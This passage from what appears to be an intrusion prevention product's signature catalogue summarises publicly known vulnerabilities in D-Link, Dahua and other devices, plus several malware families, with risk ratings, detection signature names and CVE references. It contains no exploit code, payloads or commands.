https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32150

D-Link-Dir-2640-HNAP-Privatelogin-Authentication-Bypass-Vulnerability

About this vulnerability:

A vulnerability in D-Link Systems DIR-2640

Risk:

High

First detected in:

sgpkg-ips-1616-5242

Last changed:

sgpkg-ips-1616-5242

Platform:

Generic

Software:

D-Link Systems DIR-2640

Type:

Malfunction

Description:

An authentication bypass vulnerability exists in D-Link DIR-2640 devices. The vulnerability is due to improper operation on incoming HNAP login requests. A remote attacker can exploit the vulnerabilities by sending malicious requests to the vulnerable device. Successfully exploiting these vulnerabilities could allow an attacker to log in as an authenticated user.

Situation:

File-TextId_D-Link-Dir-2640-HNAP-Privatelogin-Authentication-Bypass-Vulnerability

References:

CVE-2023-32148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32148

D-Link-Dir-605-Information-Disclosure-CVE-2021-40655

About this vulnerability:

A vulnerability in D-Link DIR-605

Risk:

High

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

D-Link

Type:

Malfunction

Description:

An information disclosure vulnerability has been reported in the firmware version 2.01MT of the D-Link DIR-605 routers. A remote, unauthenticated attacker can use this vulnerability to obtain valid user credentials via a forged HTTP request.

Situation:

HTTP_CRL-D-Link-Dir-605-Information-Disclosure-CVE-2021-40655

References:

CVE-2021-40655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40655

D-Link-DIR-615-Authentication-Bypass

About this vulnerability:

A vulnerability in D-Link DIR-615 router

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link DIR-615

Type:

Malfunction

Description:

There is an authentication bypass vulnerability in D-Link Wireless N Router DIR-615 which alllows remote attackers to reset the router's admin password.

Situation:

HTTP_CRL-D-Link-DIR-615-Authentication-Bypass

References:

CVE-2009-4821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4821

BID-37415
http://www.securityfocus.com/bid/37415

D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839

About this vulnerability:

A vulnerability in D-Link DIR-615

Risk:

High

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

D-Link DIR-615

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in D-Link DIR-615 devices. An unauthenticated attacker can exploit this by sending a crafted HTTP request that contains an overly long Authorization header or SessionID cookie value.

Situation:

HTTP_CSH-Excessively-Long-Basic-Authorization-Header
HTTP_CSH-D-Link-DIR-615-Buffer-Overflow-CVE-2018-15839

References:

CVE-2018-15839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15839

D-Link-DIR-806-HNAP-SOAPAction-Header-Command-Execution-CVE-2019-10891

About this vulnerability:

An attempt to exploit a vulnerability in D-Link detected

Risk:

High

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

An issue was discovered in D-Link DIR-806 devices. There is a command injection in function "hnap_main", which calls system() without checking the parameter that can be controlled by user, and finally allows remote attackers to execute arbitrary shell commands with a special HTTP header.

Situation:

HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution

References:

CVE-2019-10891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10891

D-Link-DIR-809-Devices-Buffer-Overflow

About this vulnerability:

A vulnerability in D-Link DIR-809 devices

Risk:

High

First detected in:

sgpkg-ips-1421-5242

Last changed:

sgpkg-ips-1421-5242

Platform:

Generic

Software:

D-Link DIR-809

Type:

Buffer Overflow

Description:

D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_80040af8 in /formWlanSetup. This vulnerability is triggered via a crafted POST request.

Situation:

HTTP_CS-D-Link-DIR-809-Devices-Buffer-Overflow

References:

CVE-2021-33274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33274

D-Link-DIR-816L-Getcfg.php-Information-Disclosure

About this vulnerability:

A vulnerability in D-Link DIR-816L

Risk:

Moderate

First detected in:

sgpkg-ips-1379-5242

Last changed:

sgpkg-ips-1379-5242

Platform:

Generic

Software:

D-Link

Type:

Code Injection

Description:

An information disclosure vulnerability has been reported in D-Link DIR-816L devices. A remote, unauthenticated attacker could use this vulnerability to gain sensitive information, such as admin credentials. This situation also covers CVE-2020-9376.

Situation:

HTTP_CRL-D-Link-DIR-816L-Getcfg.php-Information-Disclosure

References:

CVE-2020-15894
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15894

D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2022-26258

About this vulnerability:

An attempt to exploit a vulnerability in D-Link DIR-820L detected

Risk:

High

First detected in:

sgpkg-ips-1589-5242

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

D-Link DIR-820L

Type:

Input Validation

Description:

D-Link DIR-820L 1.05B03 was discovered to contain remote command execution (RCE) vulnerability via HTTP POST to get set ccp. It is in the handler of route /lan.asp, in which the value of parameter "Device Name" can be injected with malicious commands.

Situation:

HTTP_CRL-D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2022-26258

References:

CVE-2022-26258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26258

D-Link-DIR-820L-Remote-Code-Execution-Vulnerability-CVE-2023-25280

About this vulnerability:

An attempt to exploit a vulnerability in D-Link DIR-820L detected

Risk:

High

First detected in:

sgpkg-ips-1786-5242

Last changed:

sgpkg-ips-1786-5242

Platform:

Generic

Software:

D-Link DIR-820L

Type:

Input Validation

Description:

D-Link DIR820LA1 routers with the firmware version FW105B03 are affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without authentication.

Situation:

HTTP_CRL-D-Link-TRENDnet-NCC-Service-Command-Injection

References:

CVE-2023-25280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25280

D-Link-DIR-825-Buffer-Overflow-CVE-2020-29557

About this vulnerability:

A vulnerability in D-Link DIR-825 routers

Risk:

High

First detected in:

sgpkg-ips-1403-5242

Last changed:

sgpkg-ips-1403-5242

Platform:

Generic

Software:

D-Link

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in D-Link DIR-825 routers. A successful exploitation of this vulnerability can allow remote attackers to create a denial of service condition or execute arbitrary code by sending a crafted HTTP request.

Situation:

HTTP_CSU-D-Link-DIR-825-Buffer-Overflow-CVE-2020-29557

References:

CVE-2020-29557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29557

D-Link-DIR-845-HNAP-SOAPAction-Header-Command-Execution-CVE-2024-33112

About this vulnerability:

An attempt to exploit a vulnerability in D-Link detected

Risk:

High

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

D-Link DIR-845L devices v1.01KRb03 and before are vulnerable to command injection via the "hnap_main" function.

Situation:

HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution

References:

CVE-2024-33112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33112

D-Link-DIR-850L-Command-Execution

About this vulnerability:	A D-Link DIR-850L Command Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1035-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	D-Link
Type:	Input Validation
Description:	A vulnerability in DLin DIR-850L routers that allows remote attackers to execute arbitrary commands.
Situation:	HTTP_CRL-D-Link-DIR-850L-Command-Execution

D-Link-DIR-859-Gena.cgi-Remote-Command-Execution

About this vulnerability:

A vulnerability in D-Link DIR-859 routers

Risk:

High

First detected in:

sgpkg-ips-1219-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

There exists a vulnerability in D-Link DIR-859 Routers which allows remote attackers to execute arbitrary code through gena.cgi in the service parameter, due to insufficient user input validation.

Situation:

HTTP_CS-D-Link-DIR-859-Gena.cgi-Remote-Command-Execution

References:

CVE-2019-17621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17621

D-Link-DIR-859-Path-Traversal-CVE-2024-0769

About this vulnerability:

A vulnerability in D-Link DIR-859

Risk:

High

First detected in:

sgpkg-ips-1748-5242

Last changed:

sgpkg-ips-1748-5242

Platform:

Generic

Software:

D-Link

Type:

Directory Traversal

Description:

A path traversal vulnerability exists in the firmware of the D-Link DIR-859 wireless routers. A remote, unauthenticated attacker can leverage this vulnerability to obtain information such as usernames and passwords, allowing for a complete takeover of the device.

Situation:

HTTP_CRL-D-Link-DIR-859-Path-Traversal-CVE-2024-0769

References:

CVE-2024-0769
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0769

D-Link-Dir-X4860-HNAP-LocalIPAddress-Command-Injection

About this vulnerability:	A vulnerability in D-Link DIR-X4860 routers
Risk:	High
First detected in:	sgpkg-ips-1728-5242
Last changed:	sgpkg-ips-1728-5242
Platform:	Generic
Software:	D-Link
Type:	Input Validation
Description:	A command injection vulnerability has been reported in D-Link DIR-X4860 routers due to the insufficient sanitization of the user-supplied LocalIPAddress XML element value.
Situation:	File-TextId_D-Link-Dir-X4860-HNAP-LocalIPAddress-Command-Injection

D-Link-DIR816L-Moobot-Remote-Code-Execution-Attempt

About this vulnerability:

A vulnerability in D-Link DIR816L

Risk:

High

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1535-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A remote code execution vulnerability CVE-2022-28958 was reported in the D-Link DIR816L router firmware. The lack of user input validation of the value parameter was claimed to allow for arbitrary code execution.

Situation:

HTTP_CRL-D-Link-DIR816L-Moobot-Remote-Code-Execution-Attempt

References:

CVE-2022-28958
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28958

D-Link-DNS-320-Remote-Code-Execution-CVE-2020-25506

About this vulnerability:

A vulnerability in D-Link DNS-320

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

D-Link

Type:

Code Injection

Description:

A command injection vulnerability exists in D-Link DNS-320. This vulnerability can allow unauthenticated attackers to execute arbitrary code via the f_ntp_server parameter.

Situation:

HTTP_CRL-D-Link-DNS-320-Remote-Code-Execution-CVE-2020-25506

References:

CVE-2020-25506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25506

D-Link-DNS-320-ShareCenter-Remote-Code-Execution

About this vulnerability:

A vulnerability in D-Link DNS-320 ShareCenter

Risk:

High

First detected in:

sgpkg-ips-1364-5242

Last changed:

sgpkg-ips-1364-5242

Platform:

Generic

Software:

D-Link DNS-320 ShareCenter

Type:

Code Injection

Description:

There is a vulnerability in D-Link DNS-320 ShareCenter which may allow remote attackers to execute arbitrary code without authentication.

Situation:

HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Code-Execution

References:

CVE-2019-16057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16057

D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service

About this vulnerability:

A vulnerability in D-Link DNS-320 ShareCenter

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link DNS-320 ShareCenter

Type:

Malfunction

Description:

There is a vulnerability in D-Link DNS-320 ShareCenter which allows remote attackers to reboot/reset/shutdown the device without authentication.

Situation:

HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-4
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-3
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service-2
HTTP_CRL-D-Link-DNS-320-ShareCenter-Remote-Denial-Of-Service

References:

BID-50902
http://www.securityfocus.com/bid/50902

D-Link-DnsProxy-Cross-Site-Scripting

About this vulnerability:

A vulnerability in D-Link DnsProxy

Risk:

Moderate

First detected in:

sgpkg-ips-714-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link DnsProxy

Type:

Cross-site Scripting

Description:

There is a cross-site scripting vulnerability in D-Link DnsProxy.

Situation:

HTTP_CRL-D-Link-DnsProxy-Cross-Site-Scripting

References:

CVE-2015-1028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1028

BID-72725
http://www.securityfocus.com/bid/72725

OSVDB-117573
http://www.osvdb.org/117573

D-Link-DSL-2750B-Command-Injection

About this vulnerability:

A vulnerability in D-Link DSL-2750B

Risk:

High

First detected in:

sgpkg-ips-1542-5242

Last changed:

sgpkg-ips-1542-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the firmware of D-Link DSL-2750B wireless routers. An unauthenticated attacker could use this vulnerability to execute arbitrary commands via the login.cgi cli parameter value.

Situation:

HTTP_CSU-D-Link-DSL-2750B-Command-Injection

References:

CVE-2016-20017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-20017

D-Link-DSL-2760U-Cross-Site-Scripting

About this vulnerability:

A vulnerability in D-Link 2760U

Risk:

High

First detected in:

sgpkg-ips-1594-5242

Last changed:

sgpkg-ips-1594-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

Multiple cross-site scripting vulnerabilities have been reported in the web UI of the D-Link DSL-2760U routers.

Situation:

HTTP_CRL-D-Link-DSL-2760U-Cross-Site-Scripting

References:

CVE-2013-5223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5223

D-Link-DSR-250N-Denial-of-Service

About this vulnerability:

A vulnerability in D-Link DSR-250N

Risk:

High

First detected in:

sgpkg-ips-1350-5242

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

D-Link DSR-250N

Type:

Insecure Configuration

Description:

There exists a vulnerability in D-Link DSR-250N, firmware version 3.12, which allows remote attackers to create a denial of service condition by sending a request to upgradeStatusReboot.cgi due to the lack of authentication.

Situation:

HTTP_CSU-D-Link-DSR-250N-Denial-of-Service

References:

CVE-2020-26567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26567

D-Link-DWL-2600AP-Command-Injection-CVE-2019-20500

About this vulnerability:

A vulnerability in D-Link DWL-2600AP

Risk:

High

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

DLINK DWL-2600

Type:

Input Validation

Description:

A command injection vulnerability has been reported in D-Link DWL-2600AP devices (firmware version 4.2.0.15 Rev A). An authenticated attacker could use this vulnerability to execute arbitrary OS commands.

Situation:

HTTP_CS-D-Link-DWL-2600AP-Command-Injection-CVE-2019-20500

References:

CVE-2019-20500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20500

D-Link-GORT-AC750-HNAP-SOAPAction-Header-Command-Execution-CVE-2022-37056

About this vulnerability:

An attempt to exploit a vulnerability in D-Link detected

Risk:

High

First detected in:

sgpkg-ips-1818-5242

Last changed:

sgpkg-ips-1818-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

D-Link GO-RT-AC750 GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02 devices are vulnerable to command injection via the "hnap_main" function.

Situation:

HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution

References:

CVE-2022-37056
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37056

D-Link-Hardcoded-Credentials-CVE-2024-3272

About this vulnerability:

A vulnerability D-Link NAS devices

Risk:

High

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

D-Link

Type:

Backdoor

Description:

A command injection vulnerability together with publicly known hardcoded credentials in nas_sharing.cgi of various out-of-support D-Link NAS devices may allow for unauthenticated command execution.

Situation:

HTTP_CSU-D-Link-Hardcoded-Credentials-CVE-2024-3272

References:

CVE-2024-3272
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3272

D-Link-HNAP-Request-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in D-Link Systems DIR-505

Risk:

High

First detected in:

sgpkg-ips-597-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link DIR-505; D-Link DIR-505L; D-Link DSP-W215

Type:

Buffer Overflow

Description:

A remote code execution vulnerability exists in D-Link routers. The vulnerability is due to a stack buffer overflow while processing crafted HTTP POST requests addressed to the HNAP handler. By sending a crafted HTTP request to the target device, a remote unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the affected device with root privileges.

Situation:

HTTP_CS-D-Link-HNAP-Request-Stack-Buffer-Overflow

References:

CVE-2014-3936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3936

BID-67651
http://www.securityfocus.com/bid/67651

OSVDB-107049
http://www.osvdb.org/107049

D-Link-HNAP-SOAPAction-Header-Command-Execution

About this vulnerability:

An attempt to exploit a vulnerability in a D-Link HNAP SOAPAction header detected.

Risk:

High

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A vulnerability in the D-Link GetDeviceSettings functionality of the HNAP server which allows remote attackers to execute code via a crafted SOAPAction header.

Situation:

HTTP_CSH-D-Link-HNAP-SOAPAction-Header-Command-Execution

References:

CVE-2015-2051
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2051

D-Link-HNAP-SOAPAction-Stack-Overflow

About this vulnerability:	A vulnerability in D-Link Wi-Fi router
Risk:	High
First detected in:	sgpkg-ips-640-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	D-Link
Type:	Malfunction
Description:	A vulnerability exists in multiple D-Link Wi-Fi routers that allows an attacker to execute arbitrary code on the affected system.
Situation:	HTTP_CSH-D-Link-HNAP-SOAPAction-Stack-Overflow

D-Link-NAS-Appliance-Command-Injection

About this vulnerability:

A vulnerability in multiple D-Link storage appliances

Risk:

Moderate

First detected in:

sgpkg-ips-1799-5242

Last changed:

sgpkg-ips-1799-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

Improper request validation causes a command injection vulnerability in multiple D-Link storage appliances.

Situation:

HTTP_CRL-D-Link-NAS-Appliance-Command-Injection

References:

CVE-2024-10914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10914

D-Link-Router-Directory-Traversal

About this vulnerability:

Directory Traversal vulnerability in D-Link routers

Risk:

High

First detected in:

sgpkg-ips-1110-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

D-Link

Type:

Input Validation

Description:

There exists a directory traversal vulnerability in the D-Link router httpd server present in several D-Link routers. The vulnerability allows a full takeover of the router.

Situation:

HTTP_CSU-D-Link-Router-Directory-Traversal

References:

CVE-2018-10822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10822

D-Link-Router-Password-Recovery

About this vulnerability:	D-Link DIR-300 DIR-600 DIR-615 routers Password Recovery
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows;Linux
Software:	D-Link
Type:	Script Injection
Description:	A vulnerability in D-Link DIR-300 DIR-600 DIR-615 routers allowing remote attackers inject specially crafted scripts via a GET request to recover router passwords and compromise the system.
Situation:	HTTP_CSU-D-Link-Router-Password-Recovery

D-Link-Router-UPnP-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the handling of a long M-SEARCH request in D-Link

Risk:

High

First detected in:

sgpkg-ips-73-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Buffer Overflow

Description:

D-Link has a buffer overflow vulnerability in the handling of a long M-SEARCH request. A successful exploitation of this vulnerability allows a remote attacker to compromise a vulnerable network router.

Situation:

Generic_D-Link-Router-UPnP-Buffer-Overflow

References:

CVE-2006-3687
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3687

BID-19006
http://www.securityfocus.com/bid/19006

OSVDB-27333
http://www.osvdb.org/27333

D-Link-soap.cgi-Command-Injection-CVE-2018-6530

About this vulnerability:

A vulnerability in D-Link

Risk:

High

First detected in:

sgpkg-ips-1503-5242

Last changed:

sgpkg-ips-1503-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the firmware of D-Link DIR-880L, DIR-868L, DIR-865L, and DIR-860L routers. An unauthenticated attacker could use this vulnerability to execute arbitrary OS commands via an HTTP request to soap.cgi.

Situation:

HTTP_CRL-D-Link-soap.cgi-Command-Injection-CVE-2018-6530

References:

CVE-2018-6530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6530

D-Link-TFTP-Server-Buffer-Overflow

About this vulnerability:

D-Link TFTP Server 1.0 Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-647-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

D-Link TFTP

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in D-Link TFTP Server 1.0 which allows remote attackers to execute arbitrary code, or cause a denial of service condition, via a long GET or PUT request.

Situation:

TFTP_Read-Or-Write-Request-Excessively-Long-Filename

References:

CVE-2007-1435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1435

BID-22923
http://www.securityfocus.com/bid/22923

OSVDB-33977
http://www.osvdb.org/33977

D-Link-TRENDnet-NCC-Service-Command-Injection

About this vulnerability:

A D-Link TRENDnet NCC Service Command Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Malfunction

Description:

A vulnerability in multiple versions of D-Link and TRENDnet routers that allows remote attackers to execute arbitrary commands via the ping command.

Situation:

HTTP_CRL-D-Link-TRENDnet-NCC-Service-Command-Injection

References:

CVE-2015-1187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1187

BID-72816
http://www.securityfocus.com/bid/72816

D-Link-Unauthenticated-Remote-Command-Execution

About this vulnerability:

A D-Link Unauthenticated Remote Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link

Type:

Input Validation

Description:

A vulnerability in D-Link Routers, versions DIR-600 2.14b0 and DIR-300 rev B 2.13, which allows remote attackers to disclose sensitive information and execute arbitrary code through the cmd variable in command.php.

Situation:

HTTP_CRL-D-Link-Unauthenticated-Remote-Command-Execution

References:

BID-57734
http://www.securityfocus.com/bid/57734

OSVDB-89861
http://www.osvdb.org/89861

D-Link-WBR-1310-Authentication-Bypass

About this vulnerability:

A vulnerability in D-Link WBR-1310

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

D-Link WBR-1310

Type:

Malfunction

Description:

There is an authentication bypass vulnerability in D-Link WBR-1310 wireless routers that can be exploited by remote attackers to change administrative settings of the router without authenticating.

Situation:

HTTP_CRL-D-Link-WBR-1310-Authentication-Bypass

References:

BID-45554
http://www.securityfocus.com/bid/45554

D-Link-Wireless-Router-Captcha-Data-Processing-Buffer-Overflow

About this vulnerability:	A vulnerability in D-Link Systems DIR-605L
Risk:	High
First detected in:	sgpkg-ips-492-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	D-Link DIR-605L
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability exists in the D-Link DIR-605L routers. The vulnerability exists in the processing of the user-supplied CAPTCHA data from the Web-based login page when the CAPTCHA feature is enabled. By sending a crafted HTTP POST request, a remote unauthenticated attacker can exploit this vulnerability to gain root privileges on the target system.
Situation:	HTTP_CRL-D-Link-Wireless-Router-Captcha-Data-Processing-Buffer-Overflow

D-Tale-RCE

About this vulnerability:

A vulnerability in D-Tale

Risk:

High

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Linux

Software:

D-Tale

Type:

Input Validation

Description:

A vulnerability in D-Tale which allows remote attackers to execute arbitrary code via the query parameter, after setting highlightFilter to true, due to insufficient input validation.

Situation:

HTTP_CSU-D-Tale-RCE

References:

CVE-2025-0655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0655

Dahua-DVR-Auth-Bypass

About this vulnerability:

A Dahua DVR Auth Bypass vulnerability

Risk:

High

First detected in:

sgpkg-ips-779-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dahua

Type:

Insecure Configuration

Description:

A vulnerability in Dahua DVR which allows remote attackers to bypass authentication and grabs settings, reset user passwords, and clears the device logs.

Situation:

Generic_CS-Dahua-DVR-Auth-Bypass

References:

CVE-2013-6117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6117

Dahua-IP-Camera-Loopback-Authentication-Bypass-CVE-2021-33045

About this vulnerability:

A vulnerability in Dahua IP camera firmware

Risk:

High

First detected in:

sgpkg-ips-1795-5242

Last changed:

sgpkg-ips-1795-5242

Platform:

Generic

Software:

Dahua

Type:

Malfunction

Description:

Dahua IP cameras and video intercom devices with firmware versions released prior to September 2021 are vulnerable to an authentication bypass during the login process.

Situation:

HTTP_CRL-Dahua-IP-Camera-Loopback-Authentication-Bypass-CVE-2021-33045

References:

CVE-2021-33045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33045

Dahua-IP-Camera-NetKeyboard-Authentication-Bypass-CVE-2021-33044

About this vulnerability:

A vulnerability in Dahua IP camera firmware

Risk:

High

First detected in:

sgpkg-ips-1777-5242

Last changed:

sgpkg-ips-1777-5242

Platform:

Generic

Software:

Dahua

Type:

Malfunction

Description:

Dahua IP cameras and video intercom devices with firmware versions released prior to September 2021 are vulnerable to an authentication bypass during the login process.

Situation:

HTTP_CRL-Dahua-IP-Camera-NetKeyboard-Authentication-Bypass-CVE-2021-33044

References:

CVE-2021-33044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33044

Dahua-Username-Password-Disclosure

About this vulnerability:	A vulnerability in Dahua cameras
Risk:	High
First detected in:	sgpkg-ips-1322-5242
Last changed:	sgpkg-ips-1322-5242
Platform:	Generic
Software:	Dahua
Type:	Backdoor
Description:	There exists a backdoor vulnerability in Dahua cameras, generation 2 versions, which allows remote attackers to gain, and possibly change, username and password data, leading to unauthenticated command execution.
Situation:	HTTP_CSU-Dahua-Username-Password-Disclosure

Dameware-Mini-Remote-Control-Server-Pre-Authentication-BOF

About this vulnerability:

A buffer overflow vulnerability in Dameware Mini Remote Control Server

Risk:

Low

First detected in:

sgpkg-ips-507-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DameWare Mini Remote Control

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Dameware Mini Remote Control software. A crafted request with a malicious payload allows a compromise of a system running vulnerable software.

Situation:

Generic_CS-Dameware-Mini-Remote-Control-Server-Pre-Authentication-BOF

References:

CVE-2003-1030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1030

BID-14707
http://www.securityfocus.com/bid/14707

DanaBot-C2-Traffic

About this vulnerability:	DanaBot C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1108-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	DanaBot is a banking trojan with web inject and stealer functionalities. It also has a module to support VNC connections.
Situation:	Generic_CS-DanaBot-C2-Traffic

Danmec

About this vulnerability:	DanMec
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	DanMec is a Trojan that opens a backdoor on the infected machine.
Situation:	HTTP_CS-Danmec-Traffic HTTP_CSU-Danmec-Trojan-SQL-Injection-Attack File-Text_Danmec-Trojan-Download

Dapato

About this vulnerability:	Dapato
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Dapato is a Trojan that can install additional malware on the infected machine without consent.
Situation:	HTTP_CRL-Dapato-Traffic

Dark-Crystal-RAT-Infection-Traffic

About this vulnerability:	Dark Crystal RAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1397-5242
Last changed:	sgpkg-ips-1397-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Dark Crystal RAT infection traffic was detected.
Situation:	HTTP_CSU-Dark-Crystal-RAT-Infection-Traffic

Darkness-Bot

About this vulnerability:	Darkness bot
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Darkness bot is a Windows malware that can be remotely controlled.
Situation:	HTTP_CSU-Darkness-Bot-Activity File-Text_Darkness-Bot-Activity

Darkshell-Botnet

About this vulnerability:	Darkshell Botnet
Risk:	High
First detected in:	sgpkg-ips-622-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Darkshell is a Botnet used for performing Distributed Denial of Service (DDoS) attacks.
Situation:	Generic_SS-Darkshell-Botnet-Activity File-Text_Darkshell-Botnet-Activity

DarkVNC-C2-Traffic

About this vulnerability:	DarkVNC C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1097-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
